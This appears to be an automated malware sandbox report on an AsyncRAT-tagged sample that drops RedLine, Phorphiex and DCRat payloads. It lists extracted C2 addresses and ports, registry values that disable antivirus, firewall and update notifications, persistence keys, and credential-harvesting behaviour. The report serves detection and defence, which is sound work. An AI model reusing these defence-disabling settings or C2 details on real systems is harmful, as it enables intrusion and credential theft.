asyncrat | 8731222107da184b71a7a4e9e1650522b58fb26f72198ad6ec8c965bfdce0774

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/10/2024, 19:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

asyncrat phorphiex redline newwwwwwwwwwwwwwwwww pizdun collection discovery evasion execution infostealer loader persistence rat spyware stealer trojan upx worm

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

newwwwwwwwwwwwwwwwww

185.16.38.41:2033

185.16.38.41:2034

185.16.38.41:2035

185.16.38.41:2022

185.16.38.41:2023

185.16.38.41:2024

185.16.38.41:20000

185.16.38.41:6666

Mutex

AsyncMutex_XXXX765643

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

Pizdun

94.142.138.219:20936

Attributes

auth_value
20a1f7fe6575c6613ee7cc5d3025af70

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4"	sysklnorbcv.exe

Phorphiex family
phorphiex

Phorphiex payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00060000000175f1-1220.dat	family_phorphiex
behavioral1/files/0x000300000000b3e2-2051.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/568-1456-0x0000000000090000-0x00000000000C2000-memory.dmp	family_redline

Redline family
redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4708 created 1204	4708	Voyuer.pif	21

Windows security bypass 2 TTPs 12 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysklnorbcv.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0008000000016c89-90.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3788	powershell.exe
3844	powershell.exe
4256	powershell.exe
1044	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs	sameconcentrate.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumLink.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumLink.url	cmd.exe

Executes dropped EXE 21 IoCs

pid	Process
1920	tdrp.exe
3000	hiya.exe
1940	sameconcentrate.exe
2772	gagagggagagag.exe
4712	1188%E7%83%88%E7%84%B0.exe
408	20212.scr
3488	sysppvrdnvs.exe
4252	DCRatBuild127.exe
2016	1.exe
2008	2.exe
2364	DCRatBuild127.exe
2136	wildfire-test-pe-file.exe
3000	soft2.exe
2012	1.exe
1524	5_6253708004881862888.exe
3640	sysklnorbcv.exe
2964	3321917675.exe
4192	SoftShipment.exe
4708	Voyuer.pif
2552	33418802.exe
1524	1465732947.exe

Loads dropped DLL 42 IoCs

pid	Process
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
3000	hiya.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1920	tdrp.exe
1920	tdrp.exe
1984	4363463463464363463463463.exe
4252	DCRatBuild127.exe
1808	cmd.exe
1808	cmd.exe
1808	cmd.exe
1808	cmd.exe
3224	WerFault.exe
3224	WerFault.exe
2236	WerFault.exe
2236	WerFault.exe
2236	WerFault.exe
2236	WerFault.exe
3224	WerFault.exe
2236	WerFault.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1196	WerFault.exe
1196	WerFault.exe
1196	WerFault.exe
1196	WerFault.exe
1196	WerFault.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
1984	4363463463464363463463463.exe
3488	sysppvrdnvs.exe
1984	4363463463464363463463463.exe
4192	SoftShipment.exe
4480	cmd.exe
3488	sysppvrdnvs.exe
3488	sysppvrdnvs.exe
4708	Voyuer.pif

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysklnorbcv.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysklnorbcv.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	soft2.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	soft2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	soft2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	soft2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	soft2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	20212.scr
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe"	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
8	bitbucket.org
24	bitbucket.org
71	raw.githubusercontent.com
72	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
872	tasklist.exe
3096	tasklist.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2016 set thread context of 568	2016	1.exe	60
PID 1524 set thread context of 3252	1524	5_6253708004881862888.exe	76

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001707f-1175.dat	upx
behavioral1/memory/4712-1184-0x0000000000400000-0x0000000000516000-memory.dmp	upx
behavioral1/memory/1984-1181-0x0000000006660000-0x0000000006776000-memory.dmp	upx
behavioral1/memory/4712-1476-0x0000000000400000-0x0000000000516000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\Hiya!.htm	hiya.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\hiya-text.jpg	hiya.exe
File opened for modification	\??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\HIYA.gif	hiya.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\sysklnorbcv.exe	1.exe
File opened for modification	C:\Windows\DetectiveBrowsers	SoftShipment.exe
File opened for modification	C:\Windows\ThrownKnock	SoftShipment.exe
File created	C:\Windows\sysppvrdnvs.exe	20212.scr
File opened for modification	C:\Windows\sysppvrdnvs.exe	20212.scr
File created	C:\Windows\sysklnorbcv.exe	1.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3860	sc.exe
3908	sc.exe
3932	sc.exe
3804	sc.exe
3896	sc.exe
3936	sc.exe
4032	sc.exe
3836	sc.exe
3864	sc.exe
4008	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3224	2008	WerFault.exe	55
2236	2016	WerFault.exe	54

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysklnorbcv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Voyuer.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hiya.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gagagggagagag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	soft2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	20212.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tdrp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SoftShipment.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild127.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1465732947.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5_6253708004881862888.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1188%E7%83%88%E7%84%B0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild127.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x00060000000174b4-1385.dat	nsis_installer_1
behavioral1/files/0x00060000000174b4-1385.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	soft2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	soft2.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	soft2.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	soft2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	soft2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	soft2.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	soft2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	soft2.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 603998106c29db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3B23FA21-955F-11EF-A6EB-D60C98DC526F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436304039"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf600000000020000000000106600000001000020000000a76b4c850e53873385a4ab9c5184c20d55fde5013d01593b457089dfe7a1bdf7000000000e80000000020000200000008acdef3c6b2e8036ae3e611bfde59ffc23739ab4ee040866eb48630310b3b0e52000000066a3fd8dc8ea2f367d858215e9f0651fc5682095acc25bb1936890f814631d2a40000000cb7bb9e88e9ddfff897be9d59726fd161873ddc906e58f7f6998fbfeaa92626c59b97d4b4110235dfb0071d32da390d4d262273f8d17f291a5430f60e8a4d79e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	1188%E7%83%88%E7%84%B0.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf600000000020000000000106600000001000020000000ffca71d827aa515481434a6359797bf29e7db681adf8257d9853ffe321397c13000000000e8000000002000020000000861dc2ac778bc6b616ea2fd62290edc1bb1ac246b5b4aa4f064720be5f56ccbc9000000068897d5c1c26701579321e19ca0e35e7cdfed47f73a071579cb7e2149f22c7bdae07f1fb18cb7639a27702596f691125c81f776e77abc5ddf7e7b11a206f8cdf228b91c31373e15b8618a0806801793e14f1b775bf580b66d442ab3aeef950ac903b6d4fdda4c7674677e5c54a209595bece43320fe2f6ce9e1c3f6be320328551c6766bd591de20b071597474a3aa7d4000000076c3fbfed7f0b77638c2be4748ec60d7e0e614a4e1b3f571dd467264c92ffed8babe46eba340b5188b74137f2fb238bd41b2c5c3dbad5de870809ca51595538b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
